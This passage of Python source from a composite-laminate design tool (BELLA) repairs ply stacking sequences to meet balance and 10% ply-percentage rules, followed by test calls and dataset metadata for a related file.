rule\r\n if constraints.bal:\r\n ss, ply_queue = repair_10_Abdalla_ipo(ss, ply_queue, constraints)\r\n else:\r\n ss, ply_queue = repair_10_Abdalla_no_ipo(ss, ply_queue, constraints)\r\n\r\n return ss, ply_queue\r\n\r\n\r\ndef repair_10_Abdalla_ipo(ss, ply_queue, constraints):\r\n \"\"\"\r\n repairs a balanced laminate regarding the 10% rule of Abdalla\r\n\r\n INPUTS\r\n\r\n - ss: partially retrieved stacking sequence\r\n - ply_queue: queue of plies for innermost plies\r\n - constraints: design and manufacturing constraints\r\n \"\"\"\r\n n_plies = ss.size\r\n lampamA = calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints)\r\n dist_10 = calc_distance_Abdalla(lampamA, constraints)\r\n\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints)\r\n\r\n indices_to_sort = list(indices_1)\r\n indices_to_sort.insert(0, -1)\r\n# print('indices_1', list(indices_1))\r\n# print('indices_per_angle', list(indices_per_angle))\r\n# print('indices_to_sort', indices_to_sort)\r\n\r\n lampamA_options = calc_lampamA_options_1(n_plies, constraints)\r\n\r\n dist_10_options = calc_dist_10_options_1(\r\n lampamA, lampamA_options, constraints)\r\n\r\n\r\n while dist_10 > 1e-10:\r\n# print('dist_10', dist_10)\r\n# print('dist_10_options', dist_10_options)\r\n\r\n # attempts at modifying a couple of angled plies\r\n ind_pos_angle1, ind_pos_angle2 = np.unravel_index(\r\n np.argmin(dist_10_options, axis=None), dist_10_options.shape)\r\n angle1 = constraints.pos_angles[ind_pos_angle1]\r\n angle2 = constraints.pos_angles[ind_pos_angle2]\r\n# print('angle1', angle1, 'angle2', angle2)\r\n ind_angle1 = constraints.ind_angles_dict[angle1]\r\n ind_angle1_minus = constraints.ind_angles_dict[-angle1]\r\n ind_angle2 = constraints.ind_angles_dict[angle2]\r\n ind_angle2_minus = constraints.ind_angles_dict[-angle2]\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n\r\n # if no couple of plies to be deleted\r\n if angle1 in [0, 90]:\r\n # if no couple of plies to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 2:\r\n 
dist_10_options[ind_pos_angle1, ind_pos_angle2] = 1e10\r\n continue\r\n else:\r\n # if no couple of plies to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 1 \\\r\n or len(indices_per_angle[ind_angle1_minus]) < 1:\r\n dist_10_options[ind_pos_angle1, ind_pos_angle2] = 1e10\r\n continue\r\n\r\n# print('dist_10_options after clean', dist_10_options)\r\n# print('+-', angle1, ' plies changed into +-', angle2, 'plies')\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle[ind_angle1]', indices_per_angle[ind_angle1])\r\n# print('indices_per_angle[ind_angle2]', indices_per_angle[ind_angle2])\r\n\r\n lampamA += lampamA_options[ind_pos_angle2] - lampamA_options[\r\n ind_pos_angle1]\r\n dist_10 = dist_10_options[ind_pos_angle1, ind_pos_angle2]\r\n# print()\r\n# print('lampamA', lampamA)\r\n# print('dist_10', dist_10)\r\n\r\n # modification of the stacking sequence\r\n ind_ply_1 = indices_per_angle[ind_angle1].pop(0)\r\n ind_ply_2 = indices_per_angle[ind_angle1_minus].pop(0)\r\n# print('ind_ply_1', ind_ply_1)\r\n# print('ind_ply_2', ind_ply_2)\r\n# print('ply_queue', ply_queue)\r\n\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(angle1)\r\n ply_queue.append(angle2)\r\n else:\r\n ss[ind_ply_1] = angle2\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n if ind_ply_2 == 6666: # ply from the queue\r\n if angle1 == 90:\r\n ply_queue.remove(90)\r\n else:\r\n ply_queue.remove(-angle1)\r\n\r\n if angle2 == 90:\r\n ply_queue.append(90)\r\n else:\r\n ply_queue.append(-angle2)\r\n else:\r\n if angle2 != 90:\r\n ss[ind_ply_2] = -angle2\r\n else:\r\n ss[ind_ply_2] = 90\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_2 - 1] = ss[ind_ply_2]\r\n\r\n# lampamA_check = calc_lampamA_ply_queue(\r\n# ss, ss.size, ply_queue, constraints)\r\n\r\n indices_per_angle[ind_angle2].append(ind_ply_1)\r\n indices_per_angle[ind_angle2_minus].append(ind_ply_2)\r\n if constraints.sym:\r\n indices_per_angle[ind_angle2].sort(reverse=True)\r\n indices_per_angle[ind_angle2_minus].sort(reverse=True)\r\n else:\r\n sortAccording(indices_per_angle[ind_angle2], indices_to_sort)\r\n sortAccording(indices_per_angle[ind_angle2_minus], indices_to_sort)\r\n indices_per_angle[ind_angle2].reverse()\r\n indices_per_angle[ind_angle2_minus].reverse()\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n# print('dist_10', dist_10)\r\n if dist_10 < 1e-10:\r\n break\r\n\r\n dist_10_options = calc_dist_10_options_1(\r\n lampamA, lampamA_options, constraints)\r\n\r\n# print('dist_10', dist_10)\r\n\r\n # attempt at changing a 0 deg ply into a 90 deg ply\r\n ind_0 = np.where(constraints.pos_angles == 0)[0][0]\r\n ind_90 = np.where(constraints.pos_angles == 90)[0][0]\r\n\r\n if indices_per_angle[constraints.ind_angles_dict[0]]:\r\n\r\n dist_10_0_to_90 = calc_distance_Abdalla(\r\n lampamA + (lampamA_options[ind_90] - lampamA_options[ind_0])/2,\r\n constraints)\r\n# print('dist_10_0_to_90', dist_10_0_to_90)\r\n\r\n if dist_10_0_to_90 + 1e-20 < dist_10:\r\n# print('excess_10[0]', excess_10[0])\r\n# print('0 deg ply changed to 90 deg ply')\r\n dist_10 = dist_10_0_to_90\r\n lampamA += (lampamA_options[ind_90] - lampamA_options[ind_0])/2\r\n ind_ply_1 = indices_per_angle[constraints.index0].pop(0)\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(0)\r\n ply_queue.append(90)\r\n else:\r\n ss[ind_ply_1] = 90\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n# print('lampamA', lampamA)\r\n# print('dist_10', dist_10)\r\n\r\n 
return ss, ply_queue\r\n\r\n # attempt at changing a 90 deg ply into a 0 deg ply\r\n if indices_per_angle[constraints.ind_angles_dict[90]]:\r\n\r\n dist_10_90_to_0 = calc_distance_Abdalla(\r\n lampamA + (lampamA_options[ind_0] - lampamA_options[ind_90])/2,\r\n constraints)\r\n# print('dist_10_90_to_0', dist_10_90_to_0)\r\n\r\n if dist_10_90_to_0 + 1e-20 < dist_10:\r\n# print('90 deg ply changed to 0 deg ply')\r\n dist_10 = dist_10_90_to_0\r\n lampamA += (lampamA_options[ind_0] - lampamA_options[ind_90])/2\r\n ind_ply_1 = indices_per_angle[constraints.index90].pop(0)\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(90)\r\n ply_queue.append(0)\r\n else:\r\n ss[ind_ply_1] = 0\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n# print('lampamA', lampamA)\r\n# print('dist_10', dist_10)\r\n\r\n return ss, ply_queue\r\n\r\n\r\ndef repair_10_Abdalla_no_ipo(ss, ply_queue, constraints):\r\n \"\"\"\r\n repairs a non-balanced laminate regarding the 10% rule of Abdalla\r\n\r\n INPUTS\r\n\r\n - ss: partially retrieved stacking sequence\r\n - ply_queue: queue of plies for innermost plies\r\n - constraints: design and manufacturing constraints\r\n \"\"\"\r\n n_plies = ss.size\r\n lampamA = calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints)\r\n dist_10 = calc_distance_Abdalla(lampamA, constraints)\r\n# print('dist_10', dist_10)\r\n\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints)\r\n indices_to_sort = list(indices_1)\r\n indices_to_sort.insert(0, -1)\r\n# print('indices_1', list(indices_1))\r\n# print('indices_per_angle', list(indices_per_angle))\r\n# print('indices_to_sort', indices_to_sort)\r\n\r\n lampamA_options = calc_lampamA_options_3(n_plies, constraints)\r\n dist_10_options = calc_dist_10_options_3(\r\n lampamA, lampamA_options, constraints)\r\n# print('dist_10_options', dist_10_options)\r\n\r\n while dist_10 > 1e-10:\r\n # attempts at modifying a couple of angled plies\r\n ind_angle1, ind_angle2 = np.unravel_index(\r\n np.argmin(dist_10_options, axis=None), dist_10_options.shape)\r\n angle1 = constraints.set_of_angles[ind_angle1]\r\n angle2 = constraints.set_of_angles[ind_angle2]\r\n# print('test angle1', angle1, 'to angle2', angle2)\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle', indices_per_angle)\r\n\r\n # if no ply to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 1:\r\n dist_10_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n\r\n# print(angle1, ' plies changed into ', angle2, 'plies')\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle[ind_angle1]', indices_per_angle[ind_angle1])\r\n# print('indices_per_angle[ind_angle2]', indices_per_angle[ind_angle2])\r\n\r\n lampamA += lampamA_options[ind_angle2] - lampamA_options[ind_angle1]\r\n dist_10 = dist_10_options[ind_angle1, ind_angle2]\r\n\r\n # modification of the stacking sequence\r\n ind_ply_1 = indices_per_angle[ind_angle1].pop(0)\r\n# print('ind_ply_1', ind_ply_1)\r\n\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(angle1)\r\n ply_queue.append(angle2)\r\n else:\r\n ss[ind_ply_1] = angle2\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n indices_per_angle[ind_angle2].append(ind_ply_1)\r\n if constraints.sym:\r\n indices_per_angle[ind_angle2].sort(reverse=True)\r\n else:\r\n sortAccording(indices_per_angle[ind_angle2], indices_to_sort)\r\n indices_per_angle[ind_angle2].reverse()\r\n\r\n# 
print('indices_per_angle', indices_per_angle)\r\n# print('dist_10', dist_10)\r\n if dist_10 < 1e-10:\r\n break\r\n\r\n dist_10_options = calc_dist_10_options_3(\r\n lampamA, lampamA_options, constraints)\r\n# print('dist_10_options', dist_10_options)\r\n\r\n return ss, ply_queue\r\n\r\n\r\ndef repair_10_bal_2(ss_ini, mini_10, constraints):\r\n \"\"\"\r\n repairs a laminate regarding the balance guideline and the 10% rule applied\r\n on ply counts\r\n \"\"\"\r\n\r\n# if not constraints.ipo and constraints.percent_45_135 != 0:\r\n# raise Exception(\"\"\"\r\n#Repair for 10% rule not implemented for laminates with no balance requirements\r\n#and a limit percentage for the ply orientated in the combined +-45 direction!\r\n#\"\"\")\r\n\r\n# print('initial')\r\n# print_ss(ss_ini)\r\n\r\n ss = np.copy(ss_ini)\r\n if not constraints.ipo and not constraints.rule_10_percent:\r\n return ss, []\r\n\r\n if constraints.sym and ss.size % 2 and ss[ss.size // 2] not in {0, 90}:\r\n ss[ss.size // 2] = 0\r\n\r\n if constraints.sym:\r\n ind_plies = np.array(range(0, ss.size // 2))\r\n else:\r\n ind_plies = np.arange(ss.size)\r\n beginning = np.copy(ind_plies[0:ind_plies.size // 2])\r\n ending = np.copy(ind_plies[ind_plies.size // 2:ss.size][::-1])\r\n ind_plies = np.zeros((ss.size,), int)\r\n ind_plies[::2] = ending\r\n ind_plies[1::2] = beginning\r\n# print('ind_plies', list(ind_plies))\r\n\r\n ply_queue = []\r\n if constraints.rule_10_percent:\r\n for elem in range(ma.ceil(mini_10[0])):\r\n ply_queue.append(0)\r\n for elem in range(ma.ceil(mini_10[1])):\r\n ply_queue.append(90)\r\n for elem in range(ma.ceil(mini_10[2])):\r\n ply_queue.append(45)\r\n for elem in range(ma.ceil(mini_10[3])):\r\n ply_queue.append(-45)\r\n# print('initial ply queue', ply_queue)\r\n\r\n if constraints.rule_10_percent and constraints.percent_45_135:\r\n missing_extra_45_135 = ma.ceil(mini_10[4]) \\\r\n - ma.ceil(mini_10[2]) - ma.ceil(mini_10[3])\r\n else:\r\n missing_extra_45_135 = 0\r\n\r\n counter_remaining_plies = ind_plies.size\r\n\r\n change = False\r\n for counter, ind_ply in enumerate(ind_plies):\r\n# print()\r\n# print('ind_ply', ind_ply)\r\n# print('new_angle', ss[ind_ply])\r\n# print('ply_queue', ply_queue)\r\n# print_ss(ss)\r\n\r\n ply_queue_before = ply_queue[:]\r\n new_angle = ss[ind_ply]\r\n# print('ind_ply', ind_ply, 'new_angle', new_angle)\r\n counter_remaining_plies -= 1\r\n\r\n if new_angle in ply_queue:\r\n ply_queue.remove(new_angle)\r\n else:\r\n if constraints.ipo and not new_angle in (0, 90):\r\n ply_queue.append(-new_angle)\r\n if not constraints.ipo and new_angle in (45, -45):\r\n missing_extra_45_135 = max(0, missing_extra_45_135 - 1)\r\n\r\n# print('ply_queue', ply_queue, len(ply_queue))\r\n if counter_remaining_plies < len(ply_queue) + missing_extra_45_135:\r\n change = True\r\n last_ply = counter\r\n ply_queue = ply_queue_before\r\n for ind_ply in ind_plies[counter:]:\r\n ss[ind_ply] = 666\r\n if constraints.sym:\r\n ss[ss.size - ind_ply - 1] = 666\r\n break\r\n# print_ss(ss)\r\n# print('ply_queue', ply_queue)\r\n\r\n# print('last_ply', last_ply)\r\n# print('ply_queue', ply_queue, len(ply_queue))\r\n\r\n# print_ss(ss)\r\n\r\n for ind in range(missing_extra_45_135):\r\n if ind % 2:\r\n ply_queue.append(45)\r\n else:\r\n ply_queue.append(-45)\r\n\r\n if change and last_ply + len(ply_queue) != len(ind_plies):\r\n# ply_queue_2 = ply_queue[:]\r\n# ply_queue_2.append(90)\r\n# if (constraints.sym \\\r\n# and np.isclose(np.sort(np.array(2*ply_queue_2)),\r\n# np.sort(ss_ini[ss == 666])).all()) \\\r\n# or (not 
constraints.sym \\\r\n# and np.isclose(np.sort(np.array(ply_queue_2)),\r\n# np.sort(ss_ini[ss == 666])).all()):\r\n# ply_queue.append(90)\r\n# else:\r\n ply_queue.append(0)\r\n\r\n return ss, ply_queue\r\n\r\n\r\ndef calc_dist_10_options_1(lampamA, lampamA_options, constraints):\r\n \"\"\"\r\n calculates the possible distances away from the LP feasible region for the\r\n 10% of Abdalla achievable by modifying the fibre orientations of couples of\r\n angled plies in a balanced laminate\r\n\r\n dist_10_options[ind_pos_angle1, ind_pos_angle2] for +-angle1 plies changed\r\n to +-angle2 plies\r\n\r\n The plies to be modified are chosen among the innermost layers to\r\n reduce the out-of-plane modifications\r\n \"\"\"\r\n dist_10_options = 1e10*np.ones((constraints.pos_angles.size,\r\n constraints.pos_angles.size), float)\r\n for ind_pos_angle1 in range(constraints.pos_angles.size):\r\n for ind_pos_angle2 in range(constraints.pos_angles.size):\r\n if ind_pos_angle1 == ind_pos_angle2:\r\n continue\r\n LPs = lampamA - lampamA_options[ind_pos_angle1] \\\r\n + lampamA_options[ind_pos_angle2]\r\n dist_10_options[ind_pos_angle1, ind_pos_angle2] \\\r\n = calc_distance_Abdalla(LPs, constraints)\r\n\r\n return dist_10_options\r\n\r\ndef calc_dist_10_options_3(lampamA, lampamA_options, constraints):\r\n \"\"\"\r\n calculates the possible in-plane objective function values achievable by\r\n modifying one fibre orientation in a non-balanced laminate\r\n\r\n dist_10_options[ind_pos_angle1, ind_pos_angle2] for angle1 ply changed\r\n to angle2 plies\r\n \"\"\"\r\n dist_10_options = 1e10*np.ones((constraints.n_set_of_angles,\r\n constraints.n_set_of_angles), float)\r\n for ind_pos_angle1 in range(constraints.n_set_of_angles):\r\n for ind_pos_angle2 in range(constraints.n_set_of_angles):\r\n if ind_pos_angle1 == ind_pos_angle2:\r\n continue\r\n LPs = lampamA - lampamA_options[ind_pos_angle1] \\\r\n + lampamA_options[ind_pos_angle2]\r\n dist_10_options[ind_pos_angle1, ind_pos_angle2] \\\r\n = calc_distance_Abdalla(LPs, constraints)\r\n return dist_10_options\r\n\r\n\r\ndef calc_mini_10(constraints, n_plies):\r\n \"\"\"\r\n returns the minimum number of plies in the 0/90/+45/-45/+-45 directions to\r\n satisfy the 10% rule (array)\r\n\r\n INPUTS\r\n\r\n ss: stacking sequence (array)\r\n constraints: constraints (instance of the class Constraints)\r\n \"\"\"\r\n mini_10 = np.zeros((5,), float)\r\n mini_10[0] = ma.ceil(constraints.percent_0 * n_plies)\r\n mini_10[1] = ma.ceil(constraints.percent_90 * n_plies)\r\n mini_10[2] = ma.ceil(constraints.percent_45 * n_plies)\r\n mini_10[3] = ma.ceil(constraints.percent_135 * n_plies)\r\n mini_10[4] = ma.ceil(constraints.percent_45_135 * n_plies)\r\n if constraints.ipo:\r\n mini_10[2] = max(mini_10[2], mini_10[3])\r\n if mini_10[4] % 2:\r\n mini_10[4] += 1\r\n mini_10[4] = max(mini_10[4], 2 * mini_10[2])\r\n mini_10[2] = max(mini_10[2], mini_10[4] // 2)\r\n mini_10[3] = mini_10[2]\r\n\r\n if constraints.sym:\r\n mini_10 /= 2\r\n # middle ply can only be oriented at 0 or 90 degrees\r\n if n_plies % 2:\r\n mini_10[2:] = np.ceil(mini_10[2:])\r\n else:\r\n mini_10 = np.ceil(mini_10)\r\n\r\n if constraints.ipo:\r\n if mini_10[4] % 2:\r\n mini_10[4] += 1\r\n mini_10[4] = max(mini_10[4], 2 * mini_10[2])\r\n mini_10[2] = max(mini_10[2], mini_10[4] // 2)\r\n mini_10[3] = mini_10[2]\r\n\r\n return mini_10\r\n\r\ndef is_equal(ss, ply_queue, ss_ini, sym):\r\n \"\"\"\r\n returns True if the set of partial stacking sequence + ply queue matches\r\n the initial stacking sequence\r\n 
\"\"\"\r\n if not np.isclose(ss[ss != 666], ss_ini[ss != 666] ).all():\r\n return False\r\n\r\n if sym:\r\n if not np.isclose(np.sort(np.array(2*ply_queue)),\r\n np.sort(ss_ini[ss == 666])).all():\r\n return False\r\n else:\r\n if not np.isclose(np.sort(np.array(ply_queue)),\r\n np.sort(ss_ini[ss == 666])).all():\r\n return False\r\n return True\r\n\r\ndef calc_ind_plies(ss, n_plies, ply_queue, constraints, p_A=100):\r\n \"\"\"\r\n makes:\r\n - a list of all ply indices which can be modified during the refinement\r\n for membrane properties, sorted by starting with innermost plies\r\n - a list of the ply indices in each fibre direction which can be\r\n modified during the refinement for membrane properties, sorted by\r\n starting with innermost plies\r\n\r\n Notes:\r\n - al lplies from the queue of plies are included.\r\n - middle plies of symmetric laminates are not included.\r\n - the rest of the plies are included only if they are part of the\r\n inner part of laminate representing p_A %\r\n of the overall laminate thickness.\r\n \"\"\"\r\n ind_min = ma.floor(\r\n (1 - p_A/100)*(n_plies/2))\r\n# print('ind_min', ind_min)\r\n if constraints.sym:\r\n if constraints.dam_tol:\r\n if hasattr(constraints, 'dam_tol_rule') \\\r\n and constraints.dam_tol_rule in {2, 3}:\r\n indices_1 = range(max(2, ind_min), n_plies // 2)[::-1]\r\n elif not hasattr(constraints, 'dam_tol_rule') and \\\r\n constraints.n_plies_dam_tol == 2:\r\n indices_1 = range(max(2, ind_min), n_plies // 2)[::-1]\r\n else:\r\n indices_1 = range(max(1, ind_min), n_plies // 2)[::-1]\r\n else:\r\n indices_1 = range(ind_min, n_plies // 2)[::-1]\r\n else:\r\n if constraints.dam_tol:\r\n if hasattr(constraints, 'dam_tol_rule') \\\r\n and constraints.dam_tol_rule in {2, 3}:\r\n ind_1 = list(range(max(2, ind_min), n_plies // 2)[::-1])\r\n ind_2 = list(range(\r\n n_plies // 2, min(n_plies - ind_min, n_plies - 2)))\r\n elif not hasattr(constraints, 'dam_tol_rule') and \\\r\n constraints.n_plies_dam_tol == 2:\r\n ind_1 = list(range(max(2, ind_min), n_plies // 2)[::-1])\r\n ind_2 = list(range(\r\n n_plies // 2, min(n_plies - ind_min, n_plies - 2)))\r\n else:\r\n ind_1 = list(range(max(1, ind_min), n_plies // 2)[::-1])\r\n ind_2 = list(range(\r\n n_plies // 2, min(n_plies - ind_min, n_plies - 1)))\r\n else:\r\n ind_1 = list(range(ind_min, n_plies // 2)[::-1])\r\n ind_2 = list(range(n_plies // 2, n_plies - ind_min))\r\n #print('ind_1', ind_1, 'ind_2', ind_2)\r\n indices_1 = np.zeros((len(ind_1) + len(ind_2),), 'int16')\r\n indices_1[::2] = ind_2\r\n indices_1[1::2] = ind_1\r\n# print('indices_1', list(indices_1))\r\n\r\n indices_per_angle = []\r\n for ind_angle in range(constraints.n_set_of_angles):\r\n indices_per_angle.append([])\r\n\r\n for ind_ply_1 in indices_1:\r\n if ss[ind_ply_1] != 666:\r\n indices_per_angle[\r\n constraints.ind_angles_dict[ss[ind_ply_1]]].append(ind_ply_1)\r\n\r\n for angle in ply_queue:\r\n indices_per_angle[constraints.ind_angles_dict[angle]].insert(0, 6666)\r\n\r\n return indices_1, indices_per_angle\r\n\r\ndef calc_lampamA_options_1(n_plies, constraints):\r\n \"\"\"\r\n calculates the elementary changes of in-plane lamination parameters\r\n when modifying the fibre orientations of couples of angled plies\r\n \"\"\"\r\n lampamA_options = np.empty((constraints.pos_angles.size, 4), float)\r\n for ind_angle, angle in enumerate(constraints.pos_angles):\r\n lampamA_options[ind_angle] = np.copy(constraints.cos_sin[\r\n constraints.ind_angles_dict[angle]]).reshape(4)\r\n lampamA_options[ind_angle] += 
constraints.cos_sin[\r\n constraints.ind_angles_dict[-angle]].reshape(4)\r\n if not constraints.sym:\r\n lampamA_options *= (1 / n_plies)\r\n else:\r\n lampamA_options *= (2 / n_plies)\r\n return lampamA_options\r\n\r\ndef calc_lampamA_options_3(n_plies, constraints):\r\n \"\"\"\r\n calculates the elementary changes of in-plane lamination parameters\r\n when modifying a fibre orientation\r\n \"\"\"\r\n lampamA_options = np.empty((constraints.n_set_of_angles, 4), float)\r\n for ind_angle, angle in enumerate(constraints.set_of_angles):\r\n lampamA_options[ind_angle] = np.copy(\r\n constraints.cos_sin[ind_angle]).reshape(4)\r\n if not constraints.sym:\r\n lampamA_options *= 1 / n_plies\r\n else:\r\n lampamA_options *= 2 / n_plies\r\n return lampamA_options\r\n\r\ndef calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints):\r\n \"\"\"\r\n calculates in-plane lamination parameters based on a partially retrieved\r\n stacking sequence and a list of plies for the innermost plies whose\r\n positions are left to be determined\r\n \"\"\"\r\n cos_sin = np.zeros((4,), float)\r\n\r\n if not constraints.sym:\r\n for angle in ss:\r\n if angle != 666:\r\n cos_sin += constraints.cos_sin[\r\n constraints.ind_angles_dict[angle]].reshape((4, ))\r\n\r\n for angle in ply_queue:\r\n cos_sin += constraints.cos_sin[\r\n constraints.ind_angles_dict[angle]].reshape((4, ))\r\n\r\n return (1 / n_plies) * cos_sin\r\n\r\n for angle in ss[:np.size(ss) // 2]:\r\n if angle != 666:\r\n cos_sin += constraints.cos_sin[\r\n constraints.ind_angles_dict[angle]].reshape((4, ))\r\n\r\n for angle in ply_queue:\r\n cos_sin += constraints.cos_sin[\r\n constraints.ind_angles_dict[angle]].reshape((4, ))\r\n\r\n if np.size(ss) % 2:\r\n cos_sin += 0.5 * constraints.cos_sin[\r\n constraints.ind_angles_dict[ss[n_plies // 2]]].reshape((4,))\r\n\r\n return (2 / n_plies) * cos_sin\r\n\r\nif __name__ == \"__main__\":\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n rule_10_percent=True,\r\n n_contig=4,\r\n percent_0=10,\r\n percent_45=0,\r\n percent_90=10,\r\n percent_135=0,\r\n percent_45_135=10,\r\n set_of_angles=[0, 45, -45, 90])\r\n\r\n\r\n print('\\n\\n*** Test for the function is_equal ***')\r\n ss_ini = np.array([\r\n -45, 45, 60, 15, -15, 60, 30, 45, 0])\r\n ss = np.array([\r\n -45, 45, 60, 15, -15, 60, 30, 45, 0])\r\n ply_queue = []\r\n print(is_equal(ss, ply_queue, ss_ini, constraints.sym))\r\n\r\n\r\n print('\\n\\n*** Test for the function calc_mini_10 ***')\r\n mini_10 = calc_mini_10(constraints, 40)\r\n print('\\nmini_10', mini_10)\r\n n_45 = ma.ceil(mini_10[2])\r\n n_135 = ma.ceil(mini_10[3])\r\n n_45_135 = ma.ceil(mini_10[4])\r\n if constraints.rule_10_percent and constraints.percent_45_135:\r\n missing_extra_45_135 = ma.ceil(mini_10[4]) \\\r\n - ma.ceil(mini_10[2]) - ma.ceil(mini_10[3])\r\n else:\r\n missing_extra_45_135 = 0\r\n print('n_45', n_45)\r\n print('n_135', n_135)\r\n print('n_45_135', n_45_135)\r\n print('missing_extra_45_135', missing_extra_45_135)\r\n\r\n\r\n print('\\n*** Test for the function repair_10_bal***')\r\n ss_ini = np.array([60, 45, 60, 0], int)\r\n ss_ini = np.array([60, 45, 60, 15, -15, 30, 45], int)\r\n ss_ini = np.array([-45, 45, -45, 0, 0, 0, -45, 90, 45, 45], int)\r\n if constraints.sym:\r\n ss_ini = np.hstack((ss_ini, np.flip(ss_ini)))\r\n print('\\nInitial stacking sequence')\r\n print_ss(ss_ini, 2000)\r\n print('ss_ini.zize', ss_ini.size)\r\n mini_10 = calc_mini_10(constraints, ss_ini.size)\r\n print('mini_10', mini_10)\r\n ss, ply_queue = 
repair_10_bal(ss_ini, mini_10, constraints)\r\n print('\\nSolution stacking sequence')\r\n print_ss(ss, 2000)\r\n print('ply_queue', ply_queue)\r\n\r\n print('\\n*** Test for the function calc_ind_plies ***')\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n rule_10_percent=True,\r\n percent_0=10,\r\n percent_45=5,\r\n percent_90=10,\r\n percent_135=5,\r\n set_of_angles=[0, 45, 30, -30, -45, 60, -60, 90])\r\n p_A = 50\r\n ss = np.array([\r\n 45, 90, 45, 0, -45, 0, 666, 666], int)\r\n ss = np.hstack((ss, np.flip(ss)))\r\n ply_queue = [90, -45]\r\n n_plies = ss.size\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints, p_A)\r\n print('indices_1', list(indices_1))\r\n print('indices_per_angle', indices_per_angle)\r\n\r\n print('\\n*** Test for the function calc_lampamA_ply_queue ***')\r\n constraints = Constraints(\r\n sym=False,\r\n set_of_angles=[0, 45, 30, -30, -45, 60, -60, 90])\r\n ss = np.array([45, 0, 45, 0, -45, 45, 45, 0, 45, 0, -45, 45, 45, -45, -45, -45, 45, -45, 45,\r\n 666, 666, 666, 666, 666, 666, 666, 666, 666, 666, 666, 666,\r\n 45, -45, 45, -45, -45, -45, 45, 45, -45, 0, 45, 0, 45, 45, -45, 0, 45, 0, 45], int)\r\n ply_queue = [90, 90, 90, -45, -45, -45, 90, 90, 90, -45, -45, -45]\r\n n_plies = ss.size\r\n lampamA = calc_lampamA_ply_queue(\r\n ss, n_plies, ply_queue, constraints)\r\n\r\n ss = np.array([45, 0, 45, 0, -45, 45, 45, 0, 45, 0, -45, 45, 45, -45, -45, -45, 45, -45, 45,\r\n 90, 90, 90, -45, -45, -45, 90, 90, 90, -45, -45, -45,\r\n 45, -45, 45, -45, -45, -45, 45, 45, -45, 0, 45, 0, 45, 45, -45, 0, 45, 0, 45], int)\r\n lampamA_check = calc_lampam(ss, constraints)[0:4]\r\n print('lampamA', lampamA)\r\n print('lampamA_check', lampamA_check)\r\n\r\n print()\r\n constraints = Constraints(\r\n sym=True,\r\n set_of_angles=[0, 45, 30, -30, -45, 60, -60, 90])\r\n ss = np.array([45, 0, 45, 0, -45, 45, 45, 0, 45, 0, -45, 45, 45, -45, -45, -45, 45, -45, 45,\r\n 666, 666, 666, 666, 666, 666, 666, 666, 666, 666, 666, 666,\r\n 45, -45, 45, -45, -45, -45, 45, 45, -45, 0, 45, 0, 45, 45, -45, 0, 45, 0, 45], int)\r\n ply_queue = [90, 90, 90, -45, -45, -45]\r\n n_plies = ss.size\r\n lampamA = calc_lampamA_ply_queue(\r\n ss, n_plies, ply_queue, constraints)\r\n\r\n ss = np.array([45, 0, 45, 0, -45, 45, 45, 0, 45, 0, -45, 45, 45, -45, -45, -45, 45, -45, 45,\r\n 90, 90, 90, -45, -45, -45, 90, 90, 90, -45, -45, -45,\r\n 45, -45, 45, -45, -45, -45, 45, 45, -45, 0, 45, 0, 45, 45, -45, 0, 45, 0, 45], int)\r\n lampamA_check = calc_lampam(ss, constraints)[0:4]\r\n print('lampamA', lampamA)\r\n print('lampamA_check', lampamA_check)\r\n"
},
{
"alpha_fraction": 0.5766251683235168,
"alphanum_fraction": 0.5916804671287537,
"avg_line_length": 35.42996597290039,
"blob_id": "cdc2b3efd0e9d69ed2f7e743cd9d66cdcb2dc0ec",
"content_id": "d490fd7513f0a4048b1a14c515bd12ae968ff601",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11491,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 307,
"path": "/src/BELLA/panels.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
